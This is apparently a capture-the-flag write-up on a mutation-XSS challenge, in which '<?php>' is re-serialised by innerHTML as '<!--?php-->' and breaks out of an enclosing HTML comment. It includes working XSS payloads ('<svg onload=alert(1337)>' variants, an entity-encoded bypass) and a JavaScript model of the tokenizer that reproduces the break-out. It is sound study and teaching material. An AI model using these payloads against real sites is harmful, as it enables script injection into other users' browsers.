Intended
The value of the GET parameter debug ends up inside an HTML comment, which is then inserted into the DOM via innerHTML. The catch is a filter that removes the characters
!-/#&;%
so you cannot write <!-- or --> yourself. But <?php> mutates into
<!--?php-->
because the HTML tokenizer treats "<?" as the start of a bogus comment (a leftover of XML processing instructions, which is also why PHP source that is sent to a browser by accident never renders): everything up to the next ">" becomes the data of a comment node, and when that node is serialised again, which is what reading innerHTML does, it comes back as <!--?php-->. This mutation creates a new comment, which ends up nested inside the one that already wraps the parameter. HTML has no concept of nested comments: the comment state ends at the first "-->" it sees, so the "-->" of the mutated comment terminates the outer comment, and whatever follows is parsed as live markup, which lets us execute JavaScript. Read more
<?php><svg onload=alert(1337)>
<!-- Also works, because <?> is just the short form of <?php>: anything between <? and the next > becomes comment data -->
<?><svg onload=alert(1337)>
Initially, I had forgotten about blocking HTML entity characters like , so @terjanq was able to solve it. However, this was fixed soon afterwards.
<svg><b title="--><svg/onload=alert()>">aaa
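The mutation and the comment break-out, as an added example that is not part of the original writeup or of the challenge's own code. It is a cut-down model in JavaScript of the WHATWG tokenizer states involved (data, comment, bogus comment, tags with attributes) together with an innerHTML-style serializer, so it runs under Node without a DOM. It assumes the sink parses the filtered debug value as HTML once, serializes the result and only then wraps it in <!-- ... --> and parses it again, which is the only reading under which <?php> mutates at all; the names filter, tokenize, serialize, mutate, renderDebug and liveHandlers, the weaker FILTER_NO_ENTITY_BLOCK regex standing in for the first version of the challenge's filter, and the entity-encoded payload are all constructed for this example. That last payload is the input whose first serialization is exactly @terjanq's payload above, so the one block covers both the intended <?php> solution and the entity trick.

```javascript
// Added example, not code from the original challenge: a cut-down model of the WHATWG HTML
// tokenizer and serializer, enough to show why "<?php>" comes back as "<!--?php-->" and why that
// mutated comment ends the comment it is wrapped in later. Assumption: the sink parses the filtered
// value once, serializes it, then wraps it in "<!-- ... -->" and parses again. Runs under Node.

const FILTER_FIXED = /[!\-\/#&;%]/g;        // the characters the challenge strips (from the writeup)
const FILTER_NO_ENTITY_BLOCK = /[!\-\/%]/g;  // hypothetical: the same list minus the entity characters & # ;

// decimal character references only; real parsers handle far more
const decodeRefs = (s) => s.replace(/&#(\d+);/g, (_, n) => String.fromCodePoint(Number(n)));

// Reads "<name attr=value attr="value" ...>" or "</name>" starting at the "<" at index i.
function readTag(html, i) {
  const endTag = html[i + 1] === '/';
  let j = endTag ? i + 2 : i + 1;
  const name = /^[A-Za-z][^\s\/>]*/.exec(html.slice(j))[0];
  j += name.length;
  const attrs = [];
  while (j < html.length && html[j] !== '>') {
    const am = /^=?[^\s\/>=]+/.exec(html.slice(j));
    if (!am) { j += 1; continue; }                                // whitespace and stray "/" are skipped
    let value = '';
    j += am[0].length;
    if (html[j] === '=') {
      const q = html[j + 1];
      if (q === '"' || q === "'") {                               // quoted value: ">" is legal inside it
        const close = html.indexOf(q, j + 2);
        value = html.slice(j + 2, close === -1 ? html.length : close);
        j = close === -1 ? html.length : close + 1;
      } else {
        value = /^[^\s>]*/.exec(html.slice(j + 1))[0];
        j += 1 + value.length;
      }
    }
    attrs.push([am[0].toLowerCase(), decodeRefs(value)]);         // references are decoded at parse time
  }
  return { token: { type: endTag ? 'end' : 'start', name: name.toLowerCase(), attrs }, end: Math.min(j + 1, html.length) };
}

// Tokenizer covering only the states the mutation relies on.
function tokenize(html) {
  const tokens = [];
  let i = 0;
  while (i < html.length) {
    const next = html[i + 1] || '';
    if (html[i] !== '<') {                                         // data state
      const j = html.indexOf('<', i), end = j === -1 ? html.length : j;
      tokens.push({ type: 'text', data: html.slice(i, end) });
      i = end;
    } else if (html.startsWith('<!--', i)) {                       // comment state: ends at the FIRST "-->"
      const end = html.indexOf('-->', i + 4);
      tokens.push({ type: 'comment', data: html.slice(i + 4, end === -1 ? html.length : end) });
      i = end === -1 ? html.length : end + 3;
    } else if (next === '?' || next === '!' || (next === '/' && !/[A-Za-z]/.test(html[i + 2] || ''))) {
      // bogus comment state: everything up to the next ">" is comment data; "<?" keeps the "?", "<!" and "</" do not
      const start = next === '?' ? i + 1 : i + 2;
      const end = html.indexOf('>', start);
      tokens.push({ type: 'comment', data: html.slice(start, end === -1 ? html.length : end) });
      i = end === -1 ? html.length : end + 1;
    } else if (/^<\/?[A-Za-z]/.test(html.slice(i, i + 3))) {       // start or end tag
      const tag = readTag(html, i);
      tokens.push(tag.token);
      i = tag.end;
    } else {                                                       // a lone "<" is plain text
      tokens.push({ type: 'text', data: '<' });
      i += 1;
    }
  }
  return tokens;
}

// innerHTML-style serialization: comment tokens, bogus ones included, come back as real "<!-- -->"
// comments; under the classic rules "<" and ">" inside attribute values are left untouched. No tree
// is built, so closing tags for unclosed elements are not synthesized.
const escText = (s) => s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
const escAttr = (s) => s.replace(/&/g, '&amp;').replace(/"/g, '&quot;');
const serialize = (tokens) => tokens.map((t) => {
  if (t.type === 'text') return escText(t.data);
  if (t.type === 'comment') return `<!--${t.data}-->`;
  if (t.type === 'end') return `</${t.name}>`;
  return `<${t.name}${t.attrs.map(([n, v]) => ` ${n}="${escAttr(v)}"`).join('')}>`;
}).join('');

// One filter + parse + serialize round: this is where "<?php>" turns into "<!--?php-->".
const mutate = (debug, filter = FILTER_FIXED) => serialize(tokenize(debug.replace(filter, '')));
// The sink as modelled here: the mutated string is wrapped in a comment and parsed again.
const renderDebug = (debug, filter = FILTER_FIXED) => tokenize(`<!-- ${mutate(debug, filter)} -->`);
// Start tags that ended up outside the comment and carry an event-handler attribute.
const liveHandlers = (tokens) => tokens.filter((t) => t.type === 'start')
  .flatMap((t) => t.attrs.filter(([n]) => n.startsWith('on')).map(([n, v]) => `${t.name}[${n}=${v}]`));

// Constructed payloads: the first three follow the writeup; the fourth is the entity-encoded input
// whose first serialization is exactly the writeup's final payload.
const PAYLOADS = {
  blocked: '<!--><svg onload=alert(1337)>',   // "!" and "-" are stripped, so this stays inside the comment
  intended: '<?php><svg onload=alert(1337)>',
  short: '<?><svg onload=alert(1337)>',
  entity: '<svg><b title="&#45;&#45;&#62;&#60;svg&#47;onload=alert()&#62;">aaa',
};

for (const [name, p] of Object.entries(PAYLOADS)) {
  console.log(name.padEnd(8), JSON.stringify(mutate(p)), '->', liveHandlers(renderDebug(p)));
}
console.log('entity, before & # ; were blocked ->', liveHandlers(renderDebug(PAYLOADS.entity, FILTER_NO_ENTITY_BLOCK)));
```

Running it with node shows mutate('<?php>') returning <!--?php--> and renderDebug on the two intended payloads yielding an svg start tag with its onload attribute outside the comment, while the payload that tries to type <!-- directly is stripped by the filter and stays inside. The entity variant only breaks out under the weaker filter, and only because the serializer decodes &#45;&#45;&#62; on parse and writes the resulting "-->" back into the attribute value unchanged; the HTML standard was changed in 2025 so that "<" and ">" in attribute values are escaped on serialization too, and browsers that implement that change close this entity-based route, whereas the <?...> route depends only on comment serialization and is unaffected.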